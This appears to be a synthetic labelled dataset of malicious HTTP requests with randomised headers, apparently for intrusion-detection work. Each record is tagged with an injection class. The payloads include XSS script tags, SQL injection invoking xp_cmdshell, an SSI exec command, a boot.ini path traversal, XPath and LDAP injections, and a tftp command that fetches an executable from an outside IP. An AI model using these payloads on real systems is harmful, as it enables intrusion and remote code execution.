PUT /j71QpL9NyTnsz-/@.9JaNV5selectqwgetpI/sdaE/eoviW/hih/eaeDhaoedmdwAud/Ne0T/aaSsx3nstixreaad/hSzKoUu3CvD.on7AqW/pt8Eh.js? HTTP/1.0
Content-Length: 253
Content-Language: o,a2gegz9a
Content-Encoding: deflate
Content-Location: http://kw5dcej.gov/eiOiEp/cnppxait/wojin/uDMae/akcts.rar
Content-MD5: dkNsdHR4ZW94aXJvZXo1aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Dec 08 03:31:03 UTC
Last-Modified: Sat, 24 Jun 06 21:05:09 UTC
Host: www.tOcoe.org:22095
Connection: tls1
Accept: */*;q=0.0
Accept-Charset: euc-tw;q=0.8, utf-7, iso-8859-7;q=0.2, koi8-r;q=0.1, gb2312
Accept-Encoding: 
Accept-Language: hicSoiw-Ibssd0;q=0.7
Cache-Control: max-stale=69394
Client-ip: 68.45.171.152
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="9"
Date: Sun, 22 Jan 06 17:59:31 UTC
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: rcneifm=nmthhk;6exTej01=esgtdhS2
From: wsnewerh@atausf.it
If-Modified-Since: Sat, 06 Feb 10 10:54:15 CET
If-Unmodified-Since: Sat, 24 Nov 07 12:47:26 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Oct 06 12:48:14 UTC
Max-Forwards: 752
MIME-Version: 7.4
Pragma: mmosor='c'
Proxy-Authorization: NTLM eW5FcXBhcmVnbWJ1cjJhdWFlRTBsbjg1b25ld2N0bmxPVWg=
Authorization: etd1t rnmaes4t=eSeEh
Range: 939-64,563448-00397,65796-
Referer: /sseevAmf.bin
TE: deflate;q=0.2
Trailer: Referer
User-Agent: Mozilla/2.2 (X11; U; Linux i586 2.3; n3-9a; rv:2.3.7) Gecko/68172552
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: l1u/7.1 www.eb11nnua.js
Transfer-Encoding: rsyo; istsEi=noIa
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

llo=yohrhavinghe>>]uttscriptfR&a2@CTMall@kfgq=3651906&er0dqsM1=/eh3idv&yJZHhtaccesI=bAPObSxpbI&eab=37&macencu=xn&PCYWr5u_wget=tnitdahlec&isMataIngcc=caetmptdot&tEeeonirrt=tee'] | P  |     //user[ name/text(  )   =   'trne

End - Id: 48623
Start - Id: 36996
class: LdapInjection
GET /s6u-G/pLHRS1-KxpI/rj/aeoreEzsnlm.jpeg?WDu-SSlP=+xml+gonieghkhtpassl+veH&oppoy3hieanj=4ynmail&ooieAtelTRe=t04C%40Rl&t7sic047gthoa=%29++++%28+++%7C++++%28tyar%3Ddmeia*%29&bAs=exzLdzhO0K&gf38=nHrQd3e3 HTTP/1.1
Host: 31.11.197.195
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-1, isiri-3342
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=45
Client-ip: 9.220.179.73
Cookie: eviYuylr5=054236;omiiee9dvn=sCxe
Cookie2: $Version="893"
Date: Fri, 08 Apr 05 06:56:21 GMT
ETag: "B8E.sqhQTxd1WRrRZqJv"
Expect: 100-continue
From: nlnE@rejed1gea.uk
If-Modified-Since: Mon, 20 Mar 06 18:38:33 GMT
If-Unmodified-Since: Sat, 16 Apr 05 19:27:18 GMT
If-Match: "S2hjA@sUQgAy6L2G"
If-None-Match: "ZKH_-y9Yd-._F82"
If-Range: Sat, 15 Nov 08 05:56:45 UTC
Max-Forwards: 62
MIME-Version: 5.8
Pragma: 94o8dm='fn'
Proxy-Authorization: Basic YXRwaTowSWV5OGxj
Authorization: poavs iisB=ssstefcd
Range: 84-,-422477,1197-5319
Referer: http://tdh8.cz/3EjhSne/vybyeenl/t4g6wen/tTqdu/sawoaeei.cfm
TE: trailers,chunked
Trailer: User-Agent
User-Agent: Mozilla/6.6 (Windows; U; Win98 3.2; Eo-wy; rv:5.8.8) Gecko/99180845
UA-CPU: PowerPC
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 391x727
Via: loi/9.3 135.61.31.29, 3.4 www.cSreauo3.png, 8.1 www.eehoDnoi.tiff
Transfer-Encoding: deflate
Upgrade: Rtes2e/0.8, Uappi/6.8, oe526/7.2, eoop6g/8.7
Warning: 135 249.137.139.161 "EeTeptifzxaoiar" "Fri, 26 Jun 09 16:27:58 UTC"
X-Forwarded-For: 106.206.209.192
X-Serial-Number: 4092233930
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36996
Start - Id: 49283
class: XPathInjection
GET /pnrpihsyqdr1uica/eoea9iedlbkpsitmk/InN5lZV49..c.css?sGrmP_=lHoaeb%2Fstrha%2FooIcnr%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D+or+++++%27tAUo%27++++%3D++%27&eqO5=846 HTTP/1.0
Host: www.nTgE.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: de-ydelssnv;q=0.0, sps-m;q=0.0, orgyrz-QWC;q=0.6
Cache-Control: ii=eeeaidnr
Client-ip: 226.125.42.173
Cookie: nzr=:ibetweene+
Cookie2: $Version="39"
Date: Tue, 20 May 08 13:36:26 GMT
ETag: W/"fo6EYsaCceVK_1Da"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sat, 03 Nov 07 21:37:55 GMT
If-Unmodified-Since: Sun, 29 Aug 04 12:20:25 CET
If-Match: "GOvyS9qcbFxVNGoI6"
If-None-Match: "4KudhqUQ5Aq5tvloe"
If-Range: *
Max-Forwards: 168
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: NTLM bW5hTWhGZWxnM2hhcG1ydXJ0dGNlaHFlR3Fyc3JjaG43bm1ucA==
Range: 305761-528973
Referer: /tfsh5/2a4n2ns/uElooa/ebdpsr/meowsn.cgi
TE: trailers
Trailer: Trailer
User-Agent: wDcstsd (leT6GMhJoZ)
UA-CPU: Sparc
UA-Disp: 3091,890,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7888x6205
Via: HTTP/9.4 www.udhma.gif, t9a/3.6 www.rnow.tiff, 5.9 www.ytahn.png
Transfer-Encoding: deflate
Upgrade: eso/2.4, aboa/1.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 55.91.27.185
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49283
Start - Id: 49285
class: XPathInjection
GET /Ftdawg/iYG/e20x@D0ZFe/suH3T1Xa/tccvcjOBQBo/inf/t8wh1Lrgmhenaerctrs/qgaglaI9gnns9/ow/sLOYTLIN-FW6PKzATsC.tiff?latsc6hcboshQ=deletetloaeeav&0d5uaeu6hX0ds=8&Ads=8458677&Jid5turEEimhn=l8jma78opeCbfee&ralac66tgdmrxn9=saa2lersa+la+&cic4vo8o=706&VRnboot.iniRx2sOnode=n6reb&hhemHhha=aH%40Ssgo%40vPO&swshQ@2N3VLH=t87&paYussoeee4=548149&ihejMefoeceSztn=89797&sejtSttee=ooidesrDcs6tbE&r0x=tttrklNntR&tlNutsvrE=18++or+++1%3C+++ht%2Fmcn%2Fnie%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D241%5D+++++or++++14%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: 244.2.66.15
Connection: close
Accept: audio/x-wav;q=0.7, audio/*, video/mpeg;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: e-yEahhsD, i4i-rl2em
Cache-Control: no-cache
Client-ip: 226.125.42.173
Cookie: nzr=:ibetweene+
Cookie2: $Version="39"
Date: Tue, 08 Apr 08 23:57:41 CET
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Thu, 21 Sep 06 16:00:57 UTC
If-Unmodified-Since: Mon, 03 Sep 07 03:39:24 UTC
If-Match: "GOvyS9qcbFxVNGoI6"
If-None-Match: "4KudhqUQ5Aq5tvloe"
If-Range: "IFxKJoZh9sw5gW0Nj"
Max-Forwards: 55
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: NTLM bmRub2U2dHRlczVsM0llZW93ZTZtdHRSQ29lZWFvZWlrb2hoVGZlaXVyb3dlY3Q=
Range: 305761-528973
Referer: /fltgon4.jpeg
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: mo8nddr7R (ex_1Bo.; okDo3d7h)
UA-CPU: Sparc
UA-Disp: 8881,000,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7888x6205
Via: HTTP/9.4 www.udhma.gif, t9a/3.6 www.rnow.tiff, 5.9 www.ytahn.png
Transfer-Encoding: deflate
Upgrade: eso/2.4, aboa/1.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 55.91.27.185
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49285
Start - Id: 36118
class: PathTransversal
GET /1ry/bHnodemlShls63idz/0wCOIKTxhz/hlectnIyeoehwomrytx/poxE7r8dP@h2Y3XGY1l/A5JqfRICq6ulink/eYQ5j7gsTghazvar/thhhsoa/tsd/or3nEW_MyzyogYRQe2/dvGJ3iXk/Veval9B%u@.cfm?varxp_TA4Knodet=1Aehd5lH&tenYpl8Nelerti=mjftt&pwl3cyfae=hq&nuSbin8IYl=arqrc4xNFj&seoehv=+%272rperl&v4N7sunode=883&hn2looc7Eno3li=a%24+-g&g3iea7rz4fSc=404&aePwanupQt=Dhtsgau&aRm5ftn1atMel9=b+gedls+no+&3Atd8tEwj6naiae=a%3A%5Cwindows%5Cboot.ini HTTP/1.0
Host: 191.161.111.184
Connection: keep-alive
Accept: application/rtf
Accept-Charset: utf-8;q=0.7, x-mac-greek;q=0.7
Accept-Encoding: compress, compress;q=0.5, deflate
Accept-Language: z9-peebeli;q=0.3, pmcX-isoi;q=0.3, Lasf8ho-He, dei3e-rjrn4ee;q=0.7
Cache-Control: max-stale
Client-ip: 180.199.9.54
Cookie: Rp=i2e-NC
Cookie2: $Version="406"
Date: Sun, 11 Jul 04 04:00:31 UTC
ETag: "tJMxSUmbHfv8AsK3jw"
Expect: 100-continue
From: dzgo@mzeta.ch
If-Modified-Since: Wed, 18 Feb 09 10:04:32 GMT
If-Unmodified-Since: Sun, 06 Sep 09 14:14:43 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3027
MIME-Version: 7.1
Pragma: h=6etna
Proxy-Authorization: NTLM aWVhbTh3ZWFleGRmaGd0cm5VMHN0ZXh2M2lnb05qdGVoZWhzdQ==
Authorization: Digest realm
Range: 8-
Referer: http://www.txt6ihrq.st/Ehl6/oocdapd/pgqsI.bin
TE: chunked
Trailer: Max-Forwards
User-Agent: 0atee/5.2.0.6.6
UA-CPU: MIPS
UA-Disp: 0150,960,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7606x3250
Via: 4.3 www.nhwhomS5.gif, 4.8 www.eienh.js
Transfer-Encoding: gzip
Upgrade: eniw/0.3, sum/7.6, tRyoa/3.2, eolses/1.6
Warning: 643 99.90.218.216 "i6te3torsbteItixa4tu" 
X-Forwarded-For: 77.201.61.163
X-Serial-Number: 7294579742813634
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36118
Start - Id: 47888
class: XSS
GET /aRY/7RSQrHZqJHFu/lsw0dhtoitaTaoodein/AdhttpsTFPIdQrmtmphttppL/cewes9KVs/t2twyoB8gGfFSR.php?seawk8nEa4ht=rzen-p&includedYlwakLT=%26%3Cscript++%3E%5Balert+%28%27iote%27%29%3B%5D%3C%2Fscript+++%3E&P2tservicessDformBLy=lsv&deuTrmidn=o5NL&vy=94&froaunisnne=1426826 HTTP/1.0
Host: www.saoe8toes.biz
Connection: nshto
Accept: text/plain
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 67.148.171.174
Cookie: fibc3iey=28952;KbL0o1dyyd=219;6WtDjegbI=18
Cookie2: $Version="5"
Date: Sun, 27 Dec 09 01:10:57 GMT
ETag: W/"Q4X7UdUMHDqZp1@o"
Expect: wqReiiom=hhgu2ntu
From: clrwp@noorqoy.ch
If-Modified-Since: Fri, 09 Jun 06 19:55:20 GMT
If-Unmodified-Since: Fri, 25 Apr 08 06:36:25 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Dec 06 23:38:36 GMT
Max-Forwards: 12
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: NTLM dHJzNWVuaHdBYUY2aHN0aGRldG9sZndobWV0czJsRWdoYWk1ZWc=
Authorization: NTLM aXB6ZW9pbXQyMWV3VEVzb2tlaXRvdGVlaXRsdHI1bzBvYzFvZzZldGVOcmlOb3k=
Range: -43,-33,199214-
Referer: /oikn/iepat.msf
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/6.0 (Windows; U; WinNT 9.1; 47-sg; rv:9.9.8) Gecko/25409629
UA-CPU: StrongARM
UA-Disp: 213,2027,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 084x9415
Via: 2.6 www.osr8a7.js
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 467 236.48.115.46:4 "dhenjbbwtagatsai" "Wed, 29 Mar 06 13:58:45 UTC"
X-Forwarded-For: 129.38.22.254
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47888
Start - Id: 42374
class: SqlInjection
GET /gutllop/au9W5fW.r/TaEClexezp/JTT.P/bMLkBYocTmaTR3W/tdocumentadminCLxRDBV/emt/suewegntneofaha/heIc/apwrpeoeOdRf/e6s4H.shtml?evalZdR9X=%27+++++%2B++++%28+++++SELECT+++++TOP++++1+++eg++FROM++lxisr%29++++%2B++%27 HTTP/1.1
Host: 115.70.162.80
Connection: keep-alive
Accept: audio/basic, video/*;q=0.4, video/*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 97.209.57.16
Cookie: gensyeomdUned=238;on4Uith=isameoOn9%ad;ntdIr=rIz]
Cookie2: $Version="899"
Date: Wed, 19 Nov 08 12:30:39 UTC
ETag: "in9UnGe2VcAJ-eYe1"
Expect: yslocn=vUdhtgTh;enre
From: eudloA@r7hlle0nht.it
If-Modified-Since: Sat, 28 Feb 04 19:14:47 UTC
If-Unmodified-Since: Fri, 06 Jul 07 07:37:30 GMT
If-Match: "kjQCPW1Mv0dgApBYFX2@"
If-None-Match: "Nko6XW1G7fkK0lnL"
If-Range: Sat, 01 May 04 24:04:13 GMT
Max-Forwards: 4
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: 2sre htostXhr=msilt
Range: -932002
Referer: /tnlru/eorw3l/i3dcH5/Ehrrette/iqrs8efS.html
TE: chunked,gzip,trailers
Trailer: Range
User-Agent: n4nt/3.0.7
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0856x3611
Via: FTP/4.4 www.9Oom.shtml, 2.3 www.ypltTcd.css:8, 1.1 217.132.25.43
Transfer-Encoding: compress
Upgrade: Ia7/5.5, mnd/4.4, irt/6.7
Warning: 888 186.190.114.110 "ojtvy" 
X-Forwarded-For: 13.105.161.65
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 42374
Start - Id: 49132
class: XPathInjection
GET /usc/alld5a/e9KI/aMWbilNat-6ZVzVLz@LF/fB/5pVdslZbetweenE/i5LBBM7AX5_/daecugTS/hzyEyDA/22fwoaihodghdnc2uuon/on5FBHa0I/naogutr6.png?atytntsk=ipositioncr&sedsnsnmkfoA=sCBA%40TIN2v&suoI9aa9h=peOxt1tsmeta&zoelttSerith=44703408&ifeann=3&stWfnItsrotnn=8889151545&MxegYyyvjtmpMN=27558380&1atia=yp2by9&Oett=n%2FCt%2Fei%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D528%5D+%7C++++as%2Fd%2FmdT%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D48%5D++or++%27ecgtsno%27++%3D%27&okrse=%3Dr0e HTTP/1.1
Host: www.siEr.com:80
Connection: close
Accept: audio/x-wav, text/xml;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, compress;q=0.7, gzip
Accept-Language: *;q=0.7
Cache-Control: oqf='r'
Client-ip: 63.41.96.252
Cookie: i99xrQw=wqsaunph-&irdelete;nel4cmda8;se6ipwoox4meoK=489;osyosOEt50lytq=nhev
Cookie2: $Version="860"
Date: Wed, 05 Sep 07 15:10:20 CET
ETag: W/"Tvi9KhEHOu0-YyM"
Expect: 100-continue
From: NktwIe@earsOsuo.org
If-Modified-Since: Fri, 11 Jan 08 08:06:02 GMT
If-Unmodified-Since: Wed, 23 Jun 04 17:39:39 UTC
If-Match: "8381p5QNphbGnxUvL"
If-None-Match: "z5Zi@CDyExLiEsOu_43"
If-Range: *
Max-Forwards: 87
MIME-Version: 1.0
Pragma: am=adoyoe
Proxy-Authorization: Basic YWFpZDpkYW90YW5q
Authorization: Basic MGVCSWVvUHA6aWhoYWQ=
Range: 6-
Referer: http://0rvhS.fr/ipawa/eisw/sRxiii/Tieew/ezerbrg.php4
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: Mozilla/2.6 (Windows; U; WinNT 5.0; ea-yh; rv:0.9.1) Gecko/74864972
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: FTP/2.8 www.h5rdW.html, 5.1 www.ardt5s.html:60008
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 91.195.205.35
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49132
Start - Id: 46635
class: XSS
GET /lYuWztBNVwhcbQvHF/aCMBGu3rnk_aQyIFMTg/ZKrbXrZ/s9eopoh/htofcir/tzqsmuns6trba.bin?m5VVMI=nrb%7Eoform4%40eh&Msamr6Fd=t8d6rx351so&aim5=rAE_RVWx3&Sboot.iniTunionVid40t=n&igbepmjrsoawai=%3A+th0%3De%7Cis&enznserEce=gaX5A_qeztQa&etozeT=9cYKu&iet0blne2uyB7r=n%3Ds%5Bdaraaue&KAixtermUJW2YLRb=1070&ehf3m0hAee2g4Pt=riopen%3Fe+fcscript&A8RUXp3yhtpassT=934&tEAswt9irn=irrnouiyer HTTP/1.0
Host: www.t0nN.gov
Connection: eribe
Accept: text/html;q=0.7, application/rtf;q=0.8, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: <![CDATA[<!--]]  ><script  >[alert    ('TtaorhsreE');]//--></script  >
Cache-Control: hi4dOlch=i
Client-ip: 219.150.217.95
Cookie: dect=rVMYTz;j1home7v4MmVtB=sf0h;ueiiTFcrOe=window.opentbin;hd=)ucopytt;cre=78708;l9hkkovrip=e6c e  -
Cookie2: $Version="5"
Date: Tue, 05 Jan 10 09:01:18 UTC
ETag: "14UmgyVJx4Sug6vrUA4w"
Expect: vetise=ab4eliOb
From: iuaea@cvOyle.it
If-Modified-Since: Mon, 10 Jul 06 13:10:58 GMT
If-Unmodified-Since: Wed, 13 Aug 08 08:17:41 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Mar 07 10:01:45 GMT
Max-Forwards: 3261
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: Basic bnJ0bjpndEVmb24=
Range: 516737-,3-
Referer: http://int3aO.gov/aos8he/ilRiphsu.jsp
TE: trailers,chunked,deflate;q=0.0
Trailer: Via
User-Agent: 4KlaRNTr http://www.rmA4b2R.fr
UA-Pixels: 488x452
Via: 0.7 163.142.1.108
Transfer-Encoding: identity
Upgrade: Ecza/9.5
X-Serial-Number: 4075489
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46635
Start - Id: 40987
class: SqlInjection
GET /tjr/nxL/yVLh/tGjByuAPHx5eyAXDmY/i_AyoL1/mLnjGs.shtml?e5litfEsl5NEk=4670&idUF_k=3Btn8tootfa&ehyL2at0t=e8i&agwinntIkQME=09953374&tesFrlOmqe9eh=yispg9ybsaar HTTP/1.0
Host: www.ytiitm.cz
Connection: close
Accept: */*;q=0.1
Accept-Charset: macintosh;q=0.5, windows-1255
Accept-Encoding: gzip, compress;q=0.1
Accept-Language: d-heni, k-nQje7;q=0.2, dh-r;q=0.1
Cache-Control: uOddEhc=j
Client-ip: 72.36.50.94
Cookie: hirp=exec    xp_cmdshell  '"7oiNd4"    >> script.vbs'
Cookie2: $Version="11"
Date: Sun, 14 Aug 05 07:45:02 CET
ETag: W/"-ug5NWVnwdO6MSNr"
From: 0nhkngwk@nPuAseshox.org
If-Modified-Since: Wed, 28 Apr 04 11:08:06 GMT
If-Match: *
If-None-Match: "FZvavhJoOipm9l0G"
If-Range: Thu, 29 Oct 09 12:00:06 GMT
Max-Forwards: 338
Pragma: idalT=eqtrE
Authorization: Digest opaque="Ndnm"
Range: 15178-344,925-637476,9-
Referer: /vonoiiuo/tTtevp/oIer6ee/asbjttg.aspx
TE: chunked;q=0.4,trailers,gzip
User-Agent: Mozilla/7.9 (Windows; U; Win 9x 7.5; oe-9l; rv:3.8.0) Gecko/16964849
UA-CPU: x86
UA-Disp: 533,4193,32
X-Serial-Number: 7418181205236277
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40987
Start - Id: 40303
class: SSI
GET /tidshs/LQbVo4si91zU/e5WktE47iAcx_/eNetp0deults0k8a/it/tPlfrbpAB2IgCKwnEo/jbT4PRaeGus/binJFhMTnullsndmYeR/0N.mspx?3sO9b8I=gGn6cZ&ali=ihlA%2Betfcsanhh&1fl=n1O3TB-&ihde=01931074&eOtsni3lwnaa=%3C%21--+%23exec++cmd%3D%22c%3A%5Cprogra%7E1%5Cidbl9%5C6bnalitee%5Cesalem.exe+++d%3A%5ClftfE1%5Cwww.gere.org%5Ctntar%5Cdatabase.mdb++++%2Fx+exporttofoxpro%22--%3E&wsyl2uOue=turu%3C&tn-havingyECYN=mjXylb5m2&ni=wxi2bDp9o2&owhiei=btr7d HTTP/1.0
Host: 214.159.228.249:6410
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: Bthtyne=d9mau
Client-ip: 34.12.183.217
Cookie: q7uWlQLXI5D=tQWNVisew
Cookie2: $Version="373"
Date: Tue, 07 Nov 06 06:21:27 UTC
ETag: "aZA6H-lbM.cdD6r"
Expect: dwEIlasn
From: Yphp8ra@sCnoSst6.de
If-Modified-Since: Fri, 20 Feb 09 19:19:36 CET
If-Unmodified-Since: Tue, 22 Jul 08 04:21:13 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Dec 05 07:20:42 CET
Max-Forwards: 5973
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: NTLM ZW9zcnRmcjVvaWUwbGVyNmxlZWFpN3NhbHRpNjdGZXpvdG5lNGJkNGZlaGVoaW1j
Range: -2115,0045-233,-51
Referer: /TeaE6fIL.pl
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: Mozilla/9.5 (X11; U; Open BSD i586 8.5; 5x-ss; rv:0.4.8) Gecko/54537055
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2184x777
Via: 0.3 78.171.60.206
Transfer-Encoding: ramO
Upgrade: hiCkrp/2.9, tclcr/7.7, ntp5/3.3, her/1.8
Warning: 285 39.249.111.46 "orhrou3Uo8amdcneinui" "Sun, 02 Sep 07 09:37:14 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40303
Start - Id: 43355
class: OsCommanding
GET /eioiDcy.cgi?nDevalZGexec=tftp+++++-c+get++159.96.220.183%3A%2Fta%2Fengech.exe+++++%7C&Hlt5rBFnrmok=Wyasnbme3d5rsenotr HTTP/1.0
Host: www.pmomeus6t.uk:6
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 39.142.10.38
Cookie: 0ain= i7q8;pofnewtohie=inracn6yrot;98AformR=SaosAtcieuUeeoh3
Cookie2: $Version="9"
Date: Thu, 15 Jun 06 09:30:04 GMT
ETag: W/"k1P9H2sZ4nonmQR5NYQ-"
Expect: 100-continue
From: ibnemn@5dtd.it
If-Modified-Since: Thu, 15 Oct 09 08:10:15 CET
If-Unmodified-Since: Sun, 17 Oct 04 11:58:56 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 27 Jan 10 17:44:00 GMT
Max-Forwards: 1866
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="faby1"
Authorization: Digest opaque="thrtmcs3"
Range: 33667-,-94
Referer: http://www.eaomtvNh.org/oawjtt.mpg
TE: trailers
Trailer: If-Range
User-Agent: Ejieaic6lq (nGD8BeW; aT2Vp937; e8eQ2zluF)
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 331x628
Via: HTTP/0.0 68.201.151.85, eisdl/6.4 32.159.193.1:65006, HTTP/1.2 141.88.49.129:70
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 698 70.218.129.30 "npi5" 
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3733669583698502
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43355
Start - Id: 37848
class: LdapInjection
GET /b6jshutdown/@XSx/nasem4cweirrhyisqfe/ewBfXd1tEw/3Ojkiw.rWzkfB0f1NOP/dbSttcCraaznoCQtr/hyyImsytSa0ndts/1VQ@HXuB/ntpre55z62qntnhk5/nmfQqP4AT41x/scnE@/En2uXPn8Favm.mdb?cFhja3cq=581&lcSfhe=084&arno=rZNyx5l8.dL&2J9R=ksfc&secO=o2dNeoym0tts&TKR2nP-7rRgL=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&sra60=eeufw%7CRobject%3Email2%3Cn%5D&hzMtUinput=reedTss8%27olm%28d&EiroiNnethwensi=75&P5Lvkb7iJ=15215&aeRwnkEigoa=rs-1NJClI&duSinnknaoq=u6qn&ikPgLL=67&hgse0oocirnae=J%3Fcaoptetee HTTP/1.0
Host: 142.18.73.22:80
Connection: keep-alive
Accept: text/html;q=0.2, audio/basic, application/rtf;q=0.6
Accept-Charset: windows-1252;q=0.5, utf-7, iso-8859-9;q=0.0
Accept-Encoding: 
Accept-Language: puSeheoe-ct;q=0.8, ouoi-o, rntS0es-ly7h, rhl-pssx6, Dapnunrq-eteela
Cache-Control: eotsee='sehi'
Client-ip: 183.120.93.3
Cookie: efioD=a R~Roi'2gyde s%ygxml;ddirtnienc0aeeu=i8oiblweaonDosc;souswee=89869647
Cookie2: $Version="033"
Date: Tue, 27 Jun 06 07:59:47 UTC
ETag: "v.u7W79d5gfnlTy"
Expect: dhfasa=tehi4Sz;l9ae
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sun, 14 Mar 04 06:29:18 UTC
If-Unmodified-Since: Wed, 30 Jan 08 18:20:54 GMT
If-Match: *
If-None-Match: "sELIoXwqQnT6CfBa9"
If-Range: Thu, 22 Jul 04 04:40:26 CET
Max-Forwards: 935
MIME-Version: 6.8
Pragma: keZrmoo='hpAe'
Proxy-Authorization: NTLM emh5cDRTbWlJb2U3anRzeXJkOW9pY3NiOWhhYWQ0aXNldA==
Authorization: NTLM ZUVydnJlZWVpb3YzcnJyamVydElkYW80bm9kZWVvaXc=
Range: 853418-,-430
Referer: /eews/Tb5Iuoe/6crOvre/rtoRa/m6fcpdal.jpg
TE: trailers,trailers,deflate
Trailer: Date
User-Agent: Mozilla/5.1 (Windows; U; Win98 3.0; 6o-ms; rv:0.2.7) Gecko/63657192
UA-CPU: 68000
